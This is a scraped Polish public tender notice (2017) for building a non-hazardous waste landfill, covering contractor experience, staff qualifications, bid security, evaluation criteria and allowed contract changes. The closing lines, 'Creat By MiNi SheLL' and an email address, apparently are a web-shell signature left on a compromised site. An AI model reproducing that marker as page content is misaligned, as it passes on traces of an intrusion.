i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy roboty budowlane zostały wykonane należycie, w szczególności o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty. Wykonawca zobowiązany jest do przedstawienia:  
1)trzech robót budowlanych polegających na wybudowaniu składowiska odpadów innych niż niebezpieczne i obojętne o powierzchni minimum 2,0 ha w krawędziach wewnętrznych każde (powierzchnia kwatery mierzona w rzucie), o wartości minimum 2 000 000,00 zł netto dla każdej roboty budowlanej
2)jednej roboty budowlanej, której przedmiotem była budowa, rozbudowa lub przebudowa obiektu gospodarki odpadami (łącznie z wykonaniem infrastruktury towarzyszącej).
3)jednej roboty budowlanej, której przedmiotem była budowa, rozbudowa lub przebudowa składowiska odpadów innych niż niebezpieczne i obojętne (łącznie 
z wykonaniem infrastruktury towarzyszącej), obejmującego m.in. wykonanie wielowarstwowej izolacji podłoża (warstwa mineralna i syntetyczna), w tym lica skarpy ukształtowanej z istniejącego, przyległego złoża odpadów, o minimalnej wysokości bezwzględnej 8 m i powierzchni minimum 1000 m2.
Uwagi: W wykazie robót Wykonawca zobowiązany jest podać pięć różnych robót budowlanych.
Wzór wykazu stanowi załącznik nr 8 do SIWZ
2.Dokument potwierdzający, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę minimum 5 000 000,00 zł netto;
3.Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert, na kwotę min.: 5 000 000,00 zł;
4.Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakres wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami. Wykonawca zobowiązany jest do przedstawienia następującego wykazu dla osób, które będą realizowały przedmiotowe zadanie:
Kierownik budowy:
-posiadający uprawnienia budowlane w specjalności konstrukcyjno-budowlanej do kierowania robotami budowlanymi bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane wydane w świetle wcześniej obowiązujących przepisów prawa (wymagane do podania w wykazie);
-posiadający minimum pięcioletnie doświadczenie w realizacji jako kierownik budowy w zakresie budowy składowiska odpadów innych niż niebezpieczne i obojętne - co najmniej trzech o powierzchni minimum 2,0 ha w krawędziach wewnętrznych każde (powierzchnia kwatery mierzona w rzucie), o wartości minimum 2 000 000,00 zł netto dla każdej roboty (wymagane do podania w wykazie);
-posiadający co najmniej pięcioletnie doświadczenie zawodowe w pełnieniu samodzielnych funkcji w budownictwie (wymagane do podania w wykazie).
Kierownik robót drogowych:
-posiadający uprawnienia budowlane w specjalności drogowej bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane wydane w świetle wcześniej obowiązujących przepisów prawa (wymagane do podania w wykazie);
-posiadający minimum pięcioletnie doświadczenie w realizacji jako kierownik robót sieciowych w zakresie budowy składowiska odpadów innych niż niebezpieczne i obojętne - co najmniej trzech o powierzchni minimum 2,0 ha w krawędziach wewnętrznych każde (powierzchnia kwatery mierzona w rzucie), o wartości minimum 2 000 000,00 zł netto dla każdej roboty (wymagane do podania w wykazie);
-posiadający co najmniej pięcioletnie doświadczenie zawodowe w pełnieniu samodzielnych funkcji w budownictwie (wymagane do podania w wykazie).
Kierownik robót sieciowych:
-posiadający uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane wydane w świetle wcześniej obowiązujących przepisów prawa (wymagane do podania w wykazie);
-posiadający minimum pięcioletnie doświadczenie w realizacji jako kierownik robót sieciowych w zakresie budowy składowiska odpadów innych niż niebezpieczne i obojętne - co najmniej trzech o powierzchni minimum 2,0 ha w krawędziach wewnętrznych każde (powierzchnia kwatery mierzona w rzucie), o wartości minimum 2 000 000,00 zł netto dla każdej roboty (wymagane do podania w wykazie);
-posiadający co najmniej pięcioletnie doświadczenie zawodowe w pełnieniu samodzielnych funkcji w budownictwie (wymagane do podania w wykazie).
Kierownik robót elektrycznych:
-posiadający uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń lub odpowiadające im ważne uprawnienia budowlane wydane w świetle wcześniej obowiązujących przepisów prawa (wymagane do podania w wykazie);
-posiadający minimum pięcioletnie doświadczenie w realizacji jako kierownik robót sieciowych w zakresie budowy składowiska odpadów innych niż niebezpieczne i obojętne - co najmniej trzech o powierzchni minimum 2,0 ha w krawędziach wewnętrznych każde (powierzchnia kwatery mierzona w rzucie), o wartości minimum 2 000 000,00 zł netto dla każdej roboty (wymagane do podania w wykazie);
-posiadający co najmniej pięcioletnie doświadczenie zawodowe w pełnieniu samodzielnych funkcji w budownictwie (wymagane do podania w wykazie).
Wzór wykazu osób stanowi załącznik nr 9 do SIWZ.


<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.Oświadczenie zał. nr 7 do SIWZ.

2.Pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą pełnomocnictwo winno zawierać zakres i zostać podpisane przez osoby uprawnione do reprezentacji wykonawcy. Pełnomocnictwo powinno być złożone w oryginale lub kopii poświadczonej notarialnie
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b><br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1.	Oferta musi być zabezpieczona wadium w wysokości 140 000,00 zł (słownie: sto czterdzieści tysięcy złotych).
Termin wniesienia wadium upływa równocześnie z terminem złożenia oferty, tj. do dnia 20.04.2017 roku godz.: 10:00
2.	Wadium może być wnoszone w jednej lub kilku następujących formach:
a)	pieniądzu  na konto Zamawiającego w Banku Spółdzielczy w Bełchatowie nr rachunku:
     24 8965 0008 2001 0006 4288 0001
UWAGA: Przed dokonaniem wpłaty wadium w pieniądzu prosimy 
o potwierdzenie numeru konta u Zamawiającego. 

b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014 r. poz. 1804 oraz z 2015 r. poz. 978 i 1240).
3.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego.
4.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym,
5.	Wadium wnosi się przed upływem terminu składania ofert.
6.	Niezależnie od formy, w jakiej zostanie wniesione wadium, Zamawiający uzna ważne tylko oferty zabezpieczone wadium, będącym w dyspozycji Zamawiającego. W przypadku wpłaty pieniężnej na konto Zamawiającego kwota wadium musi wpłynąć na rachunek bankowy  czego potwierdzenie stanowić będą wyciągi bankowe Zamawiającego (data i godzina wpływu  uznania na rachunku Zamawiającego). 
7.	W przypadkach wniesienia wadium w formie niepieniężnej wymagane jest dołączenie oryginału dokumentu wadium do oferty (luźno, np. w osobnej kopercie), natomiast kserokopię dokumentu wystawionego na rzecz Zamawiającego poświadczonego za zgodność z oryginałem należy dopiąć do oferty. Dokumenty, o których mowa w pkt 2 muszą zachować ważność przez cały okres, w którym wykonawca jest związany z ofertą.
8.	W przypadku składania przez wykonawcę wadium w formie gwarancji powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
a)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiający), gwaranta (banku lub instytucji ubezpieczeniowej udzielającej gwarancji) oraz wskazanie ich siedziby,
b)	określenie wierzytelności, która ma być zabezpieczona gwarancja,
c)	kwotę gwarancji.
d)	termin ważności gwarancji.
9.	Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejszą, z zastrzeżeniem art. 46 ust 4a ,
10.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy,
11.	Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertą przed upływem składania ofert,
12.	Zamawiający żąda ponownego wniesienia wadium przez wykonawców, którym zwrócono wadium na podstawie art. 46 ust. 1, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego,
13.	Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę,
14.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie o którym mowa w art. 26 ust. 3 i 3a, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1, oświadczeń, o których mowa w art. 25a ust.1, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej. 
15.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
16.	Niewniesienie wadium lub wniesienie wadium po terminie składania ofert spowoduje wykluczenie Wykonawcy z postępowania.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>85</td></tr><tr><td>Termin realizacji zamówienia </td><td>10</td></tr><tr><td>Okres gwarancji i rękojmi </td><td>5</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający dopuszcza możliwość zmiany umowy:
1)w zakresie zmiany wynagrodzenia ryczałtowego w przypadku zmiany stawki podatku VAT przez ustawodawcę;
2)w zakresie wydłużenia terminu gwarancji i rękojmi na dowolny okres;
3)w przypadku wystąpienia zmian powszechnie obowiązujących przepisów prawa 
w zakresie mającym wpływ na realizację przedmiotu umowy;
4)w przypadku zmian będących następstwem działania organów administracji, 
w szczególności: przekroczenie ustanowionych przepisami prawa terminów wydawania przez organy administracji decyzji, zezwoleń, uzgodnień;
5)w zakresie terminu wykonania prac objętych przedmiotem umowy, w następujących okolicznościach: 
a)leżących po stronie Zamawiającego, w szczególności brak stworzenia dla Wykonawcy warunków do wykonania przedmiotu umowy, tj. nieterminowe i niewłaściwe przygotowanie frontu robót dla Wykonawcy;
b)złe warunki atmosferyczne;
c)katastrofa budowlana;
d)działania siły wyższej, mającej bezpośredni wpływ na terminowość wykonania przedmiotu umowy. Przez siłę wyższą należy rozumieć zdarzenie zewnętrzne, którego Strony umowy nie mogły przewidzieć, którego nie można było uniknąć, ani któremu Strony umowy nie mogły zapobiec przy zachowaniu należytej staranności, której nie można przypisać drugiej stronie, a która ma wpływ na realizację przedmiotu umowy, w tym w szczególności: powódź, pożar i inne klęski żywiołowe, strajki, nagłe przerwy w dostawie energii elektrycznej, itp.; 
e)wystąpienia konieczności wykonania robót dodatkowych i zamiennych, których zakres 
i termin realizacji ma wpływ na termin wykonania niniejszej umowy;
f)niezależnych od Wykonawcy (Wykonawca zobowiązany jest do udowodnienia, że opóźnienie w realizacji przedmiotu umowy nastąpiło z przyczyn od niego niezależnych);
g)i inne istotne okoliczności, których Zamawiający nie mógł przewidzieć w chwili zawarcia umowy;
6)w zakresie zmiany ilości i wysokości poszczególnych rat wynagrodzenia ryczałtowego (wynagrodzenie ryczałtowe nie może ulec zmianie) przysługujących Wykonawcy z tytułu wykonania przedmiotu umowy oraz w zakresie zmiany terminu płatności faktur 
 w przypadku zmiany umowy zawartej przez Zamawiającego z WFOŚ i GW w Łodzi na dofinansowanie w formie pożyczki wykonania przedmiotu umowy lub w przypadku zgody Stron na dokonanie zmiany;
7)w zakresie przedmiotu wykonania prac objętych umową w przypadku konieczności (tylko w przypadku, gdy niewykonanie lub wadliwe wykonanie przedmiotu umowy jest niezależne od Wykonawcy, a zastosowanie innych rozwiązań technicznych/technologicznych uzyska aprobatę Zamawiającego) zrealizowania umowy przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w SIWZ w sytuacji, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem umowy - co nie może wpływać na termin realizacji przedmiotu umowy, ani być przyczyną do jego wydłużenia,
8)w zakresie nieistotnej zmiany wpływającej na przedmiot umowy, nieskutkującej zmianą wynagrodzenia ryczałtowego;
9)w przypadku zmiany osoby Kierownika Budowy, Kierownika robót drogowych, Kierownika robót sieciowych, Kierownika robót elektrycznych bądź Inspektora Nadzoru;
10)w przypadku zmian podmiotu, który uczestniczy w realizacji części zamówienia jako podwykonawca, na którego potencjale opierał się Wykonawca składając ofertę, będzie możliwa jedynie pod warunkiem wykazania przez nowy podmiot spełniania warunków udziału w postępowaniu określonych w SIWZ;
11)w przypadku zmiany zakresu robót planowanych do powierzenia podwykonawcy, który uczestniczy w realizacji części zamówienia i na którego potencjale opierał się Wykonawca składając ofertę  w szczególnie uzasadnionych przypadkach;
12)w zakresie zmiany liczby faktur obciążających Wykonawcę za pobór mediów  w przypadku zmiany terminu wykonania niniejszej umowy;
13)w zakresie zmiany projektu organizacji i harmonogramu wykonania robót  w szczególnie uzasadnionych przypadkach.

<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 20/04/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com